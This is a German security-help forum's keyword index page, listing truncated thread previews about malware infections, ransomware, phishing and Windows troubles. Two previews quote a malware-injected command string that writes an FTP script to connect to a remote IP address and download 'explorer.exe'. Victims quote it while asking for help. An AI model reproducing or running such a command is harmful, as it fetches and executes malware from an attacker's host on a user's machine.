Zurück   Trojaner-Board > Themen

Alles zum Thema: Trägt

  Letzter Beitrag Antworten Hits Forum
Domain sperren
Trägt - Hallo! Einige Seiten stören Onlinedienste die ich nutze, z.B. bei einem Besuchertauschsystem. Deshalb möchte ich bestimmte Seiten sperren, mit der hosts-Datei sollte das ja prima funktionieren! Also, wenn man dort google.de einträgt, dann wird man mit jedem Browser mit dem man versucht...
Alles rund um Windows
SMART DNS im ROUTER/PI HOLE: mögliche Risiken abseits von tracking?
Trägt - Hallo Ihr Lieben, da man hier im Forum ja wohl so die ein oder andere Schadsoftware und/oder Infektionswege kennt wollte ich einmal was fragen: Ab und an soll innerhalb eines StreamingAbos gerne mal ausländischer Inhalt, die ein oder andere Serie/Folge geschaut werden. Mit einem Smart DNS...
Diskussionsforum
Win10 erstellt automatisch ordner, nachdem löschen erstellt es wieder einen
Trägt - Hi, ich habe das Phänomen, dass sich immer wieder ein Ordner auf C: erstellt. Habe Win10 frisch installiert, also ne paar Tage alte Neuistallation mit allen updates/upgrades drauf. adwcleaner und malwarebytes finden nichts... Der Ordner erstellt sich sofort nach dem löschen sofort wieder....
Alles rund um Windows
Nachricht an M-D-K-B: Rechte-Missbrauch des Moderators Cosinus
Trägt - Dieser offene Brief gilt als genau das: als persönlicher Brief an M-D-K-B Hallo M-D-K-B, ich wende mich an Dich, um dir den Rechte-Missbrauch von Cosinus zu melden. Er verschiebt permanent aus persönlichen Gründen einen rein informativen Thread von mir in den Müll-Bereich. Ich bin mir...
Lob, Kritik und Wünsche
Zweite SSD nachträglich einbinden (verschlüsselt - Laptop)
Trägt - Hallo Forum, stehe gerade auf dem Schlauch, was da o.g. Thema angeht. Habe in einen Laptop mit Manjaro (Arch-Linux) eine zweite, größere Daten-SSD eingebaut. Die erste (System-)SSD ist mit LUKS verschlüsselt, da sie teilweise wichtige Daten trägt und mir schon einmal ein Laptop gestohlen wurde....
Alles rund um Mac OSX & Linux
Element nicht gefunden - Datei löschen
Trägt - Guten Abend liebe Community! Habe nun schon seit längerem ein Problem mit einer Datei in meinem Download-Ordner. Diese trägt den Titel "Ihre Amazon.de Bestellung von" und lässt sich einfach nicht löschen. Egal, was ich mache, es kommt immer die im Anhang zu findende Fehlermeldung: ...
Plagegeister aller Art und deren Bekämpfung
Google trägt sich immer als Startseite ein
Trägt - Hallo Ich habe das Problem das sich Google immer als Startseite einträgt. https://www.google.de/?hl=de&gl=de&gws_rd=ssl Ich nutze den Rechber nicht als einziger weiß nicht was meine Mitbenutzer gemacht haben. Allerdings nervt es mich immer meine Startseite geändert zu haben. ...
Plagegeister aller Art und deren Bekämpfung
RSA-2048 Trojaner unter Windows7 - Wie entschlüsselt man die Dateien ?
Trägt - Ich habe mir vor wenigen Tagen einen Erpresser-Trojaner eingefangen. Der Rechner wurde langsam. Nach einer gewissen Zeit kam eine Informationsseite, die freundlich darauf hinweist, dass meine Dateien, und zwar alle .txt .pdf und .docx - Dateien mit einem RSA-2048 key verschlüsselt wurden. JPGs sind...
Plagegeister aller Art und deren Bekämpfung
"Rechtsanwalts"-Brief
Trägt - Scheiß Wetter, aber wenigstens die Mafia trägt zur Erheiterung bei: Gruß harlud
Diskussionsforum
Danke an Trojanerboard, insbesondere Schrauber !
Trägt - Hallo Schrauber, hallo Trojanerboardteam, Ich kann nur tausend Dank sagen und stelle fest, dass hier Leute sitzen die wirklich was drauf haben. Ich würde mich vielleicht nicht als "Lieschen Müller" bezeichnen, aber manche Dinge sind mir einfach zu hoch. Allein der Ansatz ehrenamtlich zu agieren...
Lob, Kritik und Wünsche
Neue Phishing-Mails?
Trägt - Ich habe heute erstmals auf einer E-Mail-Adresse, die ich nur für Käufe bei E-Bay nutze eine Mail bekommen mit Zip-Anhang. Die Mail trägt in der Anrede meinen kompletten Namen. Die IP-Adressen im Header sind alle aus Deutschland (3 Stück Freenet, 1 und1 , Telekom). Sonst das Übliche soll eine...
Überwachung, Datenschutz und Spam
Windows entwickelt merkwürdiges Eigenleben
Trägt - Hallo, neuerdings passiert bei mir folgendes: Zyklisch öffnet der PC unter dem gerade laufendem Programm (z.B. Acrobat Reader) "Datei öffnen" und trägt folgendes als zu öffnenden Dateinamen selbstständig ein : "eq7echo open 176.8.67.48 24546 .. eq7echo user 29085 25577 .. eq 7echo get...
Plagegeister aller Art und deren Bekämpfung
Merkwürdiges Problem unter Windows XP
Trägt - Hallo, neuerdings passiert bei mir folgendes: Zyklisch öffnet der PC unter dem gerade laufendem Programm (z.B. Acrobat Reader) "Datei öffnen" und trägt folgendes ein : "eq7echo open 176.8.67.48 24546 .. eq7echo user 29085 25577 .. eq 7echo get explorer.exe .. eq 7echo quit .. eq 7ftp ßn ßsöeq...
Alles rund um Windows
akute Gmer Haken Frage - vermutlich ganz leicht
Trägt - Hallo ich hab im Plagegeisterbrett einen Thread "BKA und Kavallerie." Nun habe ich die freie Zeit genutzt (noch kein Retter in Sicht und ich bin schon auf Seite 2 gerutscht :confused:) und bereits OTL durchlaufen lassen und wollte mich jetzt an Gmer machen. Aber ich versteh die Anleitung unter...
Diskussionsforum
"System Check" Scareware
Trägt - Hi, bei mir auf dem PC ist eine Malware aufgetaucht, die vortäuscht irgendwelche Systemfehler entdeckt zu haben. Das Programm trägt als Icon das Windows-Logo. Außerdem wurden alle Dateien versteckt und auch im Startmenü sind keine Einträge mehr vorhanden. Vielen Dank. Defogger-Log...
Plagegeister aller Art und deren Bekämpfung
Mein Stalker Freund und der geschenkte Laptop
Trägt - Hallo! Ich hoffe ich bin hier richtig, ich habe mal so eine Frage in die Runde zu stellen. Also. Ich hatte mal gute Freunde, ein Paar, doch der Mann (ein Oberkomissar) ist anscheinend durchgedreht, schrieb mir >10 mails am Tag, geschenke..ich willnicht weiter drauf eingehen. Er hat mir einen...
Überwachung, Datenschutz und Spam
PC neu aufsetzen und dabei altes OS (illegal?) entfernen
Trägt - Hallo zusammen! Habe einen gebrauchten PC den ich neu aufsetzen möchte. Ich gehe davon aus, dass das installiererte WinXP nicht ganz legal ist bzw habe ich keine Cds oder Lizenzen. Dies möchte ich unbedingt ändern. Jetzt gibt es überall nur diese "OEM-Vollversionen" zu kaufen und immer wieder...
Alles rund um Windows
Installation oder portable - was sinnvoller?
Trägt - Hi Leute, ich wollte mir soeben den Mulitprotokollmessenger Pidgin zulegen (Win7 x64) und jetzt frage ich mich, ist eine Installation sinnvoller oder eine Verwendung als Portable. Der Vorteil der Portable ist, sie nistet sich nicht im System ein. Weiterhin sehe ich keinen Nachteil der Portable,...
Alles rund um Windows
mails versenden mit meiner adresse als absender?
Trägt - hallo ist es eigentlich möglich mails zu versenden mit einem anderen adsender ohne in den account eingeloggt zu sein? also als beispiel wenn ein spam versender meine adresse als absender einträgt und damit dann spams versendet, geht das so einfach? oder muss er dafür mein passwort wissen?...
Überwachung, Datenschutz und Spam
Suche Exe Analyse Tool - Protokol Symulation von ausführungen und eintragungen
Trägt - Hallo, Es kommt immer mal wieder vor das ich eine kleine exe datei habe und Virustotal keine ausführliche Infos dazu geben kann. Die Datei muss aber ausgeführt werden. Ein Tag mal eine Freundin unbeaufsichtigt am PC gelassen, sehe ich heute eine kleine Datei namens meineDiashow.exe. Häää??? ...
Plagegeister aller Art und deren Bekämpfung
Gedichte veröffentlichen
Trägt - Hallo Ihr Lieben, ich lese und schreibe leidenschaftlich Gedichte und habe deshalb eine kleine Community erstellt, bei der jeder seine eigenen Gedichte veröffentlichen, sowie die Gedichte anderer Mitglieder lesen, bewerten und kommentieren kann. Das Projekt trägt den Namen Poezio, das ist...
Mülltonne
TR/Vundo:Gen - sehr lästig
Trägt - Hallo, über Avira Antivir wird mir bei fast allen Aktionen angezeigt, dass nnnljghI.dll im windows/system32 die Signatur von TR/Vundo.Gen trägt, aber erst seit einem Update von Antivir heute. Löschen der *.dll geht nicht, wird immer benutzt, wahrscheinlich von winlogon.exe (über "Unlocker"...
Plagegeister aller Art und deren Bekämpfung
htpach.exe von test2
Trägt - Hallo freiwillige Helfer... Mir wurde im Security Task-Manager(als Testversion downgeloadet) die Datei htpatch.exe von test2 aufgelistet.Nun habe ich beim googeln so manches zu dieser Anwendung gesehen aber nichts zu der Bezeichnung "test2" gefunden. Sie wurde als "potenziell gefährlich"...
Plagegeister aller Art und deren Bekämpfung
Wie werde ich das Ding los?
Trägt - Hallo seit einigen Tagen bekomme ich ständig die Meldung meines Antivirenprogramms, dass sich ein Schädling namens BDS/Pcclient.GV.172 eingenistet hat. (unter C.system vloume information ..... Das Ding trägt die Bezeichnung A0038960.exe. Obwohl ich den in die Quarantäne verbannt habe taucht die...
Plagegeister aller Art und deren Bekämpfung
exe aufrufen mit zusätzlichen attributen
Trägt - hi ihrs. früher wusste ich mal, wie man eine exe, die ein programm in vollbild startet, als fenster aufrufen kann. aber das muss ich vergessen haben. da trägt man doch in die verknüpfung irgendwas mit nem minus davor ein, oder? Und wo wir schonmal dabei sind, kann ich auf die Art (oder von mir...
Alles rund um Windows
Archiv
Search Engine Optimization by vBSEO ©2011, Crawlability, Inc.